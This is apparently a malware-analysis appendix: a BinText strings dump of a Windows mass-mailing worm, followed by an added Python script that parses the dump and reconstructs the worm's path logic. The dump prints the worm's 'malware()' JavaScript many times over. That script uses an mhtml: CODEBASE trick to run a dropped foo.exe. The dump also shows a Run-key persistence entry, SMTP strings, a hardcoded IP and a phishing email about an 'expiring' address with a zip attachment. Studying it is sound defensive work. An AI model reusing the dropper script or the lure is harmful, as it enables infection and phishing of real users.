00003D8D   00003D8D      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003EF7   00003EF7      0   setTimeout("malware()",150)

00003F14   00003F14      0   </script><body bgcolor=black scroll=no>

00003F3C   00003F3C      0   <SCRIPT>

00003F45   00003F45      0   function malware()

00003F5A   00003F5A      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00003F90   00003F90      0   path=unescape(path);

00003FA5   00003FA5      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000410F   0000410F      0   setTimeout("malware()",150)

0000412C   0000412C      0   </script><body bgcolor=black scroll=no>

00004154   00004154      0   <SCRIPT>

0000415D   0000415D      0   function malware()

00004172   00004172      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000041A8   000041A8      0   path=unescape(path);

000041BD   000041BD      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004327   00004327      0   setTimeout("malware()",150)

00004344   00004344      0   </script><body bgcolor=black scroll=no>

0000436C   0000436C      0   <SCRIPT>

00004375   00004375      0   function malware()

0000438A   0000438A      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000043C0   000043C0      0   path=unescape(path);

000043D5   000043D5      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000453F   0000453F      0   setTimeout("malware()",150)

0000455C   0000455C      0   </script><body bgcolor=black scroll=no>

00004584   00004584      0   <SCRIPT>

0000458D   0000458D      0   function malware()

000045A2   000045A2      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000045D8   000045D8      0   path=unescape(path);

000045ED   000045ED      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004757   00004757      0   setTimeout("malware()",150)

00004774   00004774      0   </script><body bgcolor=black scroll=no>

0000479C   0000479C      0   <SCRIPT>

000047A5   000047A5      0   function malware()

000047BA   000047BA      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000047F0   000047F0      0   path=unescape(path);

00004805   00004805      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000496F   0000496F      0   setTimeout("malware()",150)

0000498C   0000498C      0   </script><body bgcolor=black scroll=no>

000049B4   000049B4      0   <SCRIPT>

000049BD   000049BD      0   function malware()

000049D2   000049D2      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00004A08   00004A08      0   path=unescape(path);

00004A1D   00004A1D      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00004B87   00004B87      0   setTimeout("malware()",150)

00004BA4   00004BA4      0   </script>

Appendix B

File pos   Mem pos      ID   Text

========   =======      ==   ====

0000004D   0040004D      0   !This program cannot be run in DOS mode.

00000178   00400178      0   .text

000001C8   004001C8      0   .data

000001F0   004001F0      0   .idata

0000044A   0040104A      0   t ;t$$t

0000047D   0040107D      0   SVWUj

00001E4D   00402A4D      0   <>.u"

000026FB   004032FB      0   Wh<IG

000040AA   00404CAA      0   9=0y@

0000470B   0040530B      0   s3A<-t

00004722   00405322      0   <Ar'<

00004730   00405330      0   <\t.<

0000477D   0040537D      0   v$<-t

00004787   00405387      0   <0r><9v

0000478F   0040538F      0   <Ar6<[r

0000479D   0040539D      0   t*<zv

00004829   00405429      0   <@t%<.u

0000486B   0040546B      0   tn;t$

000049B1   004055B1      0   ?"u#j"

00004E5A   0047405A      0   ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

00004E9B   0047409B      0   aweriouiopasafihokozavbnmcabcdefghijklmnopqrstuvwxyzoeioaearieao

0000532C   0047452C      0   abcdefghijklmnopqrstuvwxyz@.15

0000534C   0047454C      0   <body bgcolor=black scroll=no>

0000536B   0047456B      0   <SCRIPT>

00005374   00474574      0   function malware()

00005389   00474589      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000053BF   004745BF      0   path=unescape(path);

000053D4   004745D4      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000553E   0047473E      0   setTimeout("malware()",150)

0000555B   0047475B      0   </script>

00005565   00474765      0   MIME-Version: 1.0

00005577   00474777      0   Content-Location:File://foo.exe

00005597   00474797      0   Content-Transfer-Encoding: binary

000055BB   004747BB      0   VideoDriver

000055C7   004747C7      0   Software\Microsoft\Windows\CurrentVersion\Run

000055F5   004747F5      0   \videodrv.exe

00005605   00474805      0   C:\Program Files\

00005617   00474817      0   www.google.com

0000562A   0047482A      0   Error creating window

00005641   00474841      0   \eml.tmp

0000564A   0047484A      0   \exe.tmp

00005653   00474853      0   \zip.tmp

0000565C   0047485C      0   RegisterServiceProcess

00005673   00474873      0   kernel32.dll

00005680   00474880      0   Failed to connect: '%s'

00005699   00474899      0   From: %s

000056A2   004748A2      0   To: <%s>

000056AB   004748AB      0   Reply-To: <%s>

000056BA   004748BA      0   Subject: %s

000056C8   004748C8      0   %s %d

000056CE   004748CE      0   hostent() error: %d

000056E3   004748E3      0   Lookup failed

000056F2   004748F2      0   MX: '%s'

000056FC   004748FC      0   Domain: '%s'

0000570A   0047490A      0   c:\tmpe.tmp

00005724   00474924      0   LINE %d

0000572D   0047492D      0   Line %d: %s

0000578A   0047498A      0   Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

000057CB   004749CB      0   Failed to open '%s'

000057E0   004749E0      0   Memory allocation error, file %s, size %d

0000580B   00474A0B      0   Read error

00005873   00474A73      0   212.5.86.163

0000589D   00474A9D      0   From: %s

000058A6   00474AA6      0   To: %s

000058AD   00474AAD      0   Reply-To: %s

000058C2   00474AC2      0   RCPT TO:<%s>

000058D1   00474AD1      0   MAIL FROM:<%s>

000058E2   00474AE2      0   HELO localhost

000058F7   00474AF7      0   admin@

000058FE   00474AFE      0   ----------%s

0000590B   00474B0B      0   %.8X%.8X

00005914   00474B14      0   X-Mailer: The Bat! (v1.61)

0000592F   00474B2F      0   X-Priority: 2 (High)

00005944   00474B44      0   Subject: your account                         %s

00005975   00474B75      0   MIME-Version: 1.0

00005987   00474B87      0   Content-Type: multipart/mixed; boundary="%s"

000059BA   00474BBA      0   Content-Type: text/plain; charset=us-ascii

000059E5   00474BE5      0   Content-Transfer-Encoding: 7bit

00005A07   00474C07      0   Hello there,

00005A15   00474C15      0   I would like to inform you about important information regarding your

00005A5B   00474C5B      0   email address. This email address will be expiring.

00005A8F   00474C8F      0   Please read attachment for details.

00005AB8   00474CB8      0   Best regards, Administrator

00005ADD   00474CDD      0   Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C   00474D1C      0   Content-Transfer-Encoding: base64

00005B3E   00474D3E      0   Content-Disposition: attachment; filename="message.zip"

00005B7B   00474D7B      0   --%s--

00005B89   00474D89      0   message.html

0000605A   0047545A      0   SysAllocString

0000606E   0047546E      0   CoCreateInstance

00006082   00475482      0   CLSIDFromString

00006096   00475496      0   CoInitialize

000060A6   004754A6      0   CoUninitialize

000060BA   004754BA      0   WSAGetLastError

000060CE   004754CE      0   WSAStartup

000060DE   004754DE      0   closesocket

000060EE   004754EE      0   connect

000060FA   004754FA      0   gethostbyname

0000610A   0047550A      0   htons

00006112   00475512      0   inet_addr

0000611E   0047551E      0   ioctlsocket

0000612E   0047552E      0   ntohs

0000613E   0047553E      0   select

00006152   00475552      0   socket

0000615E   0047555E      0   GetNetworkParams

00006172   00475572      0   FileTimeToDosDateTime

0000618A   0047558A      0   FindFirstFileA

0000619E   0047559E      0   FindNextFileA

000061AE   004755AE      0   FormatMessageA

000061C2   004755C2      0   GetCommandLineA

000061D6   004755D6      0   GetFileSize

000061E6   004755E6      0   GetModuleHandleA

000061FA   004755FA      0   CloseHandle

0000620A   0047560A      0   GetProcAddress

0000621E   0047561E      0   GetSystemTimeAsFileTime

0000623A   0047563A      0   GetTickCount

0000624A   0047564A      0   GetWindowsDirectoryA

00006262   00475662      0   CopyFileA

0000626E   0047566E      0   LoadLibraryA

0000627E   0047567E      0   CreateFileA

0000628E   0047568E      0   ReadFile

0000629A   0047569A      0   RtlUnwind

000062A6   004756A6      0   RtlZeroMemory

000062B6   004756B6      0   Sleep

000062BE   004756BE      0   TerminateThread

000062D2   004756D2      0   WinExec

000062DE   004756DE      0   CreateThread

000062EE   004756EE      0   DeleteFileA

000062FE   004756FE      0   GetWindowTextA

00006312   00475712      0   GetForegroundWindow

0000632A   0047572A      0   LoadCursorA

0000633A   0047573A      0   LoadIconA

00006346   00475746      0   SetTimer

00006352   00475752      0   KillTimer

0000635E   0047575E      0   RegisterClassA

00006372   00475772      0   MessageBoxA

00006382   00475782      0   GetMessageA

00006392   00475792      0   TranslateMessage

000063A6   004757A6      0   DispatchMessageA

000063BA   004757BA      0   PostQuitMessage

000063CE   004757CE      0   CreateWindowExA

000063E2   004757E2      0   DefWindowProcA

000063F6   004757F6      0   GetStockObject

0000640A   0047580A      0   RegEnumValueA

0000641A   0047581A      0   RegCloseKey

0000642A   0047582A      0   RegOpenKeyA

0000643A   0047583A      0   RegSetValueExA

0000644E   0047584E      0   _filelength

0000645E   0047585E      0   _fileno

0000646A   0047586A      0   __GetMainArgs

00006482   00475882      0   fclose

0000648E   0047588E      0   fgets

00006496   00475896      0   fopen

0000649E   0047589E      0   fprintf

000064AA   004758AA      0   fread

000064BA   004758BA      0   fwrite

000064C6   004758C6      0   malloc

000064D2   004758D2      0   memcpy

000064DE   004758DE      0   printf

000064EA   004758EA      0   raise

000064F2   004758F2      0   signal

000064FE   004758FE      0   sprintf

0000650A   0047590A      0   strcat

00006516   00475916      0   strchr

00006522   00475922      0   strcmp

0000652E   0047592E      0   strcpy

0000653A   0047593A      0   strlen

00006546   00475946      0   strncat

00006552   00475952      0   strncmp

0000655E   0047595E      0   strncpy

00006567   00475967      0   AOLEAUT32.DLL

0000657C   0047597C      0   ole32.DLL

00006598   00475998      0   wsock32.dll

000065D8   004759D8      0   iphlpapi.DLL

000065E6   004759E6      0   y0<PG

000065EC   004759EC      0   KERNEL32.DLL

000065FA   004759FA      0   WePPG

00006658   00475A58      0   USER32.DLL

0000669C   00475A9C      0   GDI32.DLL

000066AC   00475AAC      0   ADVAPI32.DLL


000066CC   00475ACC      0   CRTDLL.DLL

00006820   00406820      0   <body bgcolor=black scroll=no>

0000683F   0040683F      0   <SCRIPT>

00006848   00406848      0   function malware()

0000685D   0040685D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006893   00406893      0   path=unescape(path);

000068A8   004068A8      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006A12   00406A12      0   setTimeout("malware()",150)

00006A2F   00406A2F      0   </script><body bgcolor=black scroll=no>

00006A57   00406A57      0   <SCRIPT>

00006A60   00406A60      0   function malware()

00006A75   00406A75      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006AAB   00406AAB      0   path=unescape(path);

00006AC0   00406AC0      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006C2A   00406C2A      0   setTimeout("malware()",150)

00006C47   00406C47      0   </script><body bgcolor=black scroll=no>

00006C6F   00406C6F      0   <SCRIPT>

00006C78   00406C78      0   function malware()

00006C8D   00406C8D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006CC3   00406CC3      0   path=unescape(path);

00006CD8   00406CD8      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006E42   00406E42      0   setTimeout("malware()",150)

00006E5F   00406E5F      0   </script><body bgcolor=black scroll=no>

00006E87   00406E87      0   <SCRIPT>

00006E90   00406E90      0   function malware()

00006EA5   00406EA5      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006EDB   00406EDB      0   path=unescape(path);

00006EF0   00406EF0      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000705A   0040705A      0   setTimeout("malware()",150)

00007077   00407077      0   </script><body bgcolor=black scroll=no>

0000709F   0040709F      0   <SCRIPT>

000070A8   004070A8      0   function malware()

000070BD   004070BD      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000070F3   004070F3      0   path=unescape(path);

00007108   00407108      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007272   00407272      0   setTimeout("malware()",150)

0000728F   0040728F      0   </script><body bgcolor=black scroll=no>

000072B7   004072B7      0   <SCRIPT>

000072C0   004072C0      0   function malware()

000072D5   004072D5      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000730B   0040730B      0   path=unescape(path);

00007320   00407320      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000748A   0040748A      0   setTimeout("malware()",150)

000074A7   004074A7      0   </script><body bgcolor=black scroll=no>

000074CF   004074CF      0   <SCRIPT>

000074D8   004074D8      0   function malware()

000074ED   004074ED      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007523   00407523      0   path=unescape(path);

00007538   00407538      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000076A2   004076A2      0   setTimeout("malware()",150)

000076BF   004076BF      0   </script><body bgcolor=black scroll=no>

000076E7   004076E7      0   <SCRIPT>

000076F0   004076F0      0   function malware()

00007705   00407705      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000773B   0040773B      0   path=unescape(path);

00007750   00407750      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000078BA   004078BA      0   setTimeout("malware()",150)

000078D7   004078D7      0   </script><body bgcolor=black scroll=no>

000078FF   004078FF      0   <SCRIPT>

00007908   00407908      0   function malware()


0000791D   0040791D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007953   00407953      0   path=unescape(path);

00007968   00407968      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007AD2   00407AD2      0   setTimeout("malware()",150)

00007AEF   00407AEF      0   </script><body bgcolor=black scroll=no>

00007B17   00407B17      0   <SCRIPT>

00007B20   00407B20      0   function malware()

00007B35   00407B35      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007B6B   00407B6B      0   path=unescape(path);

00007B80   00407B80      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007CEA   00407CEA      0   setTimeout("malware()",150)

00007D07   00407D07      0   </script><body bgcolor=black scroll=no>

00007D2F   00407D2F      0   <SCRIPT>

00007D38   00407D38      0   function malware()

00007D4D   00407D4D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007D83   00407D83      0   path=unescape(path);

00007D98   00407D98      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007F02   00407F02      0   setTimeout("malware()",150)

00007F1F   00407F1F      0   </script><body bgcolor=black scroll=no>

00007F47   00407F47      0   <SCRIPT>

00007F50   00407F50      0   function malware()

00007F65   00407F65      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007F9B   00407F9B      0   path=unescape(path);

00007FB0   00407FB0      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000811A   0040811A      0   setTimeout("malware()",150)

00008137   00408137      0   </script><body bgcolor=black scroll=no>

0000815F   0040815F      0   <SCRIPT>

00008168   00408168      0   function malware()

0000817D   0040817D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000081B3   004081B3      0   path=unescape(path);

000081C8   004081C8      0   document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111"  CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00008332   00408332      0   setTimeout("malware()",150)

0000834F   0040834F      0   </script>

00005715   00474915      0   p value

0000573C   0047493C      0   {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
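The dump above is long, and the useful facts in it (which API families are imported, that the same <SCRIPT> block is stored many times, and what the embedded script actually builds out of document.URL) are easier to pull out with a small parser than by eye. The following is an added example, not code from the original write-up or from the worm: it parses BinText's "File pos / Mem pos / ID / Text" layout, buckets strings by capability, extracts the embedded markup, and re-implements the script's path derivation so the final mhtml: CODEBASE value can be seen for a given location of message.html. The capability regexes and the sample document.URL values are assumptions chosen for illustration; the sample dump is a subset of rows copied from the appendix.

```python
"""Added example (not from the original write-up): a parser for BinText-style
string dumps in the "File pos / Mem pos / ID / Text" layout used in Appendix A.
It buckets imported API names by capability, pulls out embedded markup and
counts the <SCRIPT> copies, and re-implements the path derivation the embedded
script performs on document.URL so the resulting mhtml: CODEBASE can be seen.
The capability regexes and the sample document URLs are assumptions chosen for
illustration; the sample dump is a subset of rows copied from the page.
"""
import re
from urllib.parse import unquote

# Constructed sample: a subset of rows copied from the BinText output above.
SAMPLE_DUMP = r"""File pos   Mem pos      ID   Text
========   =======      ==   ====
0000640A   0047580A      0   RegEnumValueA
0000641A   0047581A      0   RegCloseKey
0000642A   0047582A      0   RegOpenKeyA
0000643A   0047583A      0   RegSetValueExA
00006496   00475896      0   fopen
000064BA   004758BA      0   fwrite
00006598   00475998      0   wsock32.dll
000065D8   004759D8      0   iphlpapi.DLL
00006820   00406820      0   <body bgcolor=black scroll=no>
0000683F   0040683F      0   <SCRIPT>
00006848   00406848      0   function malware()
0000685D   0040685D      0   s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
00006893   00406893      0   path=unescape(path);
00006A12   00406A12      0   setTimeout("malware()",150)
00006A2F   00406A2F      0   </script><body bgcolor=black scroll=no>
00006A57   00406A57      0   <SCRIPT>
00006A60   00406A60      0   function malware()
"""

# One BinText row: 8-hex file offset, 8-hex memory address, resource ID, text.
ROW = re.compile(r"^([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})\s+(\d+)\s+(.*?)\s*$")

# Assumed capability buckets; extend to taste.  Matching is on the string
# alone, so a hit says "the name is present", not "the call is reached".
CAPABILITIES = {
    "registry": re.compile(r"^Reg(Open|Set|Enum|Close|Create|Query|Delete)"),
    "network": re.compile(r"^(wsock32\.dll|iphlpapi\.dll|WSA|send|recv|connect|gethostbyname)", re.I),
    "file_io": re.compile(r"^(fopen|fclose|fread|fwrite|fgets|_filelength|_fileno)$"),
    "gui": re.compile(r"^(CreateWindowExA|RegisterClassA|MessageBoxA|SetTimer|KillTimer)$"),
}

# Strings that belong to the embedded HTML/JavaScript rather than the import table.
MARKUP = re.compile(r"^(<|function |s=document|path=|document\.write|setTimeout)")


def parse_rows(dump):
    """Return (file_offset, mem_address, text) for every data row; the
    repeated column headers and '====' rulers do not match and are skipped."""
    rows = []
    for line in dump.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((int(m.group(1), 16), int(m.group(2), 16), m.group(4)))
    return rows


def bucket_imports(rows):
    """Group strings by capability; a string may land in more than one bucket."""
    found = {name: [] for name in CAPABILITIES}
    for _, _, text in rows:
        for name, pat in CAPABILITIES.items():
            if pat.search(text):
                found[name].append(text)
    return found


def embedded_markup(rows):
    """Strings that look like the embedded HTML/script payload, in file order."""
    return [text for _, _, text in sorted(rows) if MARKUP.match(text)]


def count_script_copies(rows):
    """How many times the <SCRIPT> block is repeated in the binary."""
    return sum(1 for _, _, text in rows if text.strip().upper() == "<SCRIPT>")


def derive_codebase(document_url):
    """Reproduce what the embedded script does with document.URL:
    s.substr(-0, s.lastIndexOf("\\")) keeps everything before the last
    backslash (substr(-0, n) is substr(0, n); a negative length yields ""),
    unescape() decodes %XX sequences (urllib's unquote is equivalent for the
    ASCII case), and the result is spliced into the mhtml: CODEBASE."""
    cut = document_url.rfind("\\")
    path = document_url[:cut] if cut >= 0 else ""
    path = unquote(path)
    return "mhtml:" + path + "\\message.html!File://foo.exe"


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_DUMP)
    for name, names in bucket_imports(rows).items():
        print(f"{name:9s} {names}")
    print("script copies:", count_script_copies(rows))
    # Assumed document.URL values as IE reported them for a local file.
    print(derive_codebase(r"file://C:\Documents%20and%20Settings\user\Desktop\message.html"))
    print(derive_codebase("file:///C:/Temp/message.html"))
```

Two things worth noticing from running it against the full dump: the <SCRIPT> block is stored once per 0x218 bytes, so the count tells you how many copies of message.html's body the worm carries, and the path derivation only works when document.URL contains backslashes; for a forward-slash file:/// URL the script produces `mhtml:\message.html!File://foo.exe`, which does not point at the dropped file.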